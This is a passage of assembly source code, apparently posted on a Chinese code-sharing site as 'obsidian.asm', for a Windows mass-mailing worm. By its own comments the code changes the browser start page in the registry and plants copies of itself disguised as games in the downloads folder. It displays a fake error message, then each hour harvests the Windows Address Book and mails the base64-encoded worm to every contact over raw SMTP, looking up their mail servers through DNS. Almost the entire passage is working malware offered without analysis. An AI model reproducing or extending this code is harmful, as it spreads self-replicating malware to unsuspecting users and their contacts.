📄 obsidian.asm
字号:
setStartPage:
call RegOpenKeyA, HKEY_CURRENT_USER, offset szStartPageKey, offset hKey
cmp eax, 0
jne endProgram
; create a value
call RegSetValueExA, hKey, offset szStartPageName, 0, REG_SZ, offset szStartPageValue, 128
; close key
call RegCloseKey, hKey
;----------------------------------------------------------------------------
; Create a game in the c:\my downloads directory
;----------------------------------------------------------------------------
createGame:
call CheckDirectory ; check to see if bogus software already exists
cmp eax, -1
je endProgram
call GetSystemTime, offset time
xor eax, eax
mov ax, time.wHour
call CreateSoftware, eax ; Select a game to create based on the hour
;----------------------------------------------------------------------------
; Main
;----------------------------------------------------------------------------
endProgram:
cmp parameterA, TRUE
je remainActive
; display a bogus error message and exit if no -A parameter was found
call MessageBoxA, 0, offset szErrorMessage, offset szErrorTitle, 16
call ExitProcess, 0
remainActive:
call Sleep, 100 ; free up the processor time
call GetSystemTime, offset time ; get the system time
cmp time.wMinute, 1 ; try mass mailing every hour
jne remainActive
cmp time.wSecond, 1
jne remainActive
xor eax, eax
mov ax, time.wDayOfWeek
call MassMail ; select an email message to send based on the day of the week
jmp remainActive
;----------------------------------------------------------------------------
; Functions
;----------------------------------------------------------------------------
CheckDirectory PROC
;
; This function searches the c:\my downloads directory for any
; software that has already been created.
;
call FindFirstFileA, offset szSearchString, offset win32_find_data
mov hFindFile, eax
searchFiles:
mov eax, win32_find_data.FileSizeLow
cmp al, 13h
je fileFound
call FindNextFileA, hFindFile, offset win32_find_data
cmp eax, 0 ; no more exe files left?
jne searchFiles
call FindClose, hFindFile
xor eax, eax
ret
fileFound:
call FindClose, hFindFile
mov eax, -1
ret
CheckDirectory ENDP
CreateSoftware PROC softwareID:DWORD
;
; This function creates a copy of this virus in the c:\my downloads
; folder and disguises it as a piece of valid software like a
; computer game.
;
call SetCurrentDirectoryA, offset szMyDownloads
;cmp eax, 0
;je createFailure
; get the address of the software record specified in softwareID
xor edx, edx
mov eax, softwareID
mov ebx, 54 ; record size
mul ebx
add eax, offset softwareTable
mov recordPosition, eax
; create the software in the c:\my downloads folder
call CreateFileA, eax, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_NEW, 0, 0
mov hFile, eax
cmp eax, -1
je createFailure
; write program to file
call WriteFile, hFile, offset buffer, 16384, offset numberOfBytes, 0
; Set the filesize
mov eax, [recordPosition]
add eax, 50
mov eax, [eax]
dec eax ; eax = filesize - 1
call SetFilePointer, hFile, eax, 0, FILE_BEGIN
call WriteFile, hFile, offset buffer, 1, offset numberOfBytes, 0
; close file
call CloseHandle, hFile
xor eax, eax
ret
createFailure:
mov eax, -1
ret
CreateSoftware ENDP
MassMail PROC
;
; This function sends an email with the worm attachment to everyone
; in the windows address book.
;
; get the record position
xor edx, edx
mov ebx, 220 ; record size
mul ebx
add eax, offset emailTable
mov recordPosition, eax
; get the path of the system WAB file
call RegOpenKeyA, HKEY_CURRENT_USER, offset szWabKey, offset hKey
call RegQueryValueExA, hKey, 0, 0, offset dataType, offset szWabValue, offset bufferSize
call RegCloseKey, hKey
; open the WAB file
call CopyFileA, offset szWabValue, offset szWabook, 0
call CreateFileA, offset szWabook, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0
mov hFile, eax
cmp eax, -1
je cleanUp
; get the number of email addresses
call SetFilePointer, hFile, 64h, 0, FILE_BEGIN
call ReadFile, hFile, offset numberOfEmails, 4, offset numberOfBytes, 0
cmp numberOfEmails, 0
je cleanUp
; get the pointer to the email table
call SetFilePointer, hFile, 60h, 0, FILE_BEGIN
call ReadFile, hFile, offset pointerToEmails, 4, offset numberOfBytes, 0
; seek to the email table
call SetFilePointer, hFile, pointerToEmails, 0, FILE_BEGIN
; initialize winsock
call WSAStartup, 0101h, offset WSAData
cmp eax, 0
jne cleanUp
sendEmail:
; get an email address in its UNICODE format
call ReadFile, hFile, offset emailAddressUNI, 68, offset numberOfBytes, 0
; convert the email address to ASCII
call ConvertUniToAsc, offset emailAddressUNI, offset emailAddressASC
; get the domain name from the meail message
mov eax, offset emailAddressASC
findAt:
inc eax
cmp byte ptr [eax], '@'
jne findAt
inc eax
call lstrcpyA, offset szQuery, eax
call mkMail
; create the email message
call lstrcatA, offset emailMessage, offset emailP1
;append FROM email address
call lstrcatA, offset emailMessage, dword ptr [recordPosition]
call lstrcatA, offset emailMessage, offset emailP2
; append TO email address
call lstrcatA, offset emailMessage, offset emailAddressASC
call lstrcatA, offset emailMessage, offset emailP3
; append subject
mov eax, [recordPosition]
add eax, 50
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP4
; append message
mov eax, [recordPosition]
add eax, 100
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP5
; append filename
mov eax, [recordPosition]
add eax, 200
call lstrcatA, offset emailMessage, eax
call lstrcatA, offset emailMessage, offset emailP6
; get the smtp server name
mov ecx, 3
findSmtp:
push ecx
call GetSmtpDomain
pop ecx
cmp eax, 0
; je foundSmtp
dec ecx
cmp ecx, 0
jne findSmtp
jmp abortSend
foundSmtp:
; connect to the email server
; call lstrcpyA, offset szSMTP, offset szDnsx
call ConnectToHost, offset hSock, offset szSMTP, 25, SOCK_STREAM
call TimeOut, hSock, 5000
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the HELO command
call send, hSock, offset helo, 17, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the MAIL FROM command
call lstrcatA, offset sendBuffer, offset szMailFrom
call lstrcatA, offset sendBuffer, dword ptr [recordPosition]
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
call RtlZeroMemory, offset sendBuffer, 100
; send the RCPT TO command
call lstrcatA, offset sendBuffer, offset szMailTo
call lstrcatA, offset sendBuffer, offset emailAddressASC
call lstrcatA, offset sendBuffer, offset szBracket
call lstrlenA, offset sendBuffer
call send, hSock, offset sendBuffer, eax, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the DATA command
call send, hSock, offset sendData, 6, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the message data
call lstrlenA, offset emailMessage
call send, hSock, offset emailMessage, eax, 0
; attach the worm to the email message
mov esi, offset buffer
mov ecx, 4096
attachWorm:
pusha
call Base64Encode, esi, offset bytes4
call send, hSock, offset bytes4, 4, 0
popa
add esi, 3
dec ecx
cmp ecx, 0
jne attachWorm
call send, hSock, offset emailP7, 22, 0
; send the . command
call send, hSock, offset dot, 5, 0
; get response
call recv, hSock, offset sendBuffer, 100, 0
; send the QUIT command
call send, hSock, offset endMail, 6, 0
abortSend:
call closesocket, hSock
; clear some buffers
call RtlZeroMemory, offset emailMessage, 4096
call RtlZeroMemory, offset sendBuffer, 100
call RtlZeroMemory, offset szQuery, 100
call RtlZeroMemory, offset szQuery2, 100
call RtlZeroMemory, offset szQueryLabels, 100
call RtlZeroMemory, offset szSMTP, 100
call RtlZeroMemory, offset dnsBuffer, 1000
call RtlZeroMemory, offset emailAddressASC, 34
call RtlZeroMemory, offset emailAddressUNI, 68
dec numberOfEmails
cmp numberOfEmails, 0
jne sendEmail
cleanUp:
call WSACleanup
call CloseHandle, hFile
ret
MassMail ENDP
ConvertUniToAsc PROC uniString:DWORD, ascString:DWORD
;
; This routine converts a zero terminated UNICODE string to an
; ASCII string.
;
mov esi, uniString
mov edi, ascString
convertAsc:
mov al, byte ptr [esi]
mov byte ptr [edi], al
add esi, 2
inc edi
cmp word ptr [esi], 0
jne convertAsc
ret
ConvertUniToAsc ENDP
GetSmtpDomain PROC
;
; This functions gets the domain name of a smtp server
;
; connect to the DNS server
call ConnectToHost, offset hSock, offset szDnsName, 53, SOCK_DGRAM
cmp eax, -1
je smtpFailure
call TimeOut, hSock, 5000
call StringToLabels, offset szQuery, offset szQueryLabels
call QueryDNS, hSock, offset dnsBuffer, 1000, offset szQueryLabels, DNS_TYPE_NS, DNS_CLASS_IN
cmp eax, -1
je smtpFailure
call closesocket, hSock
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -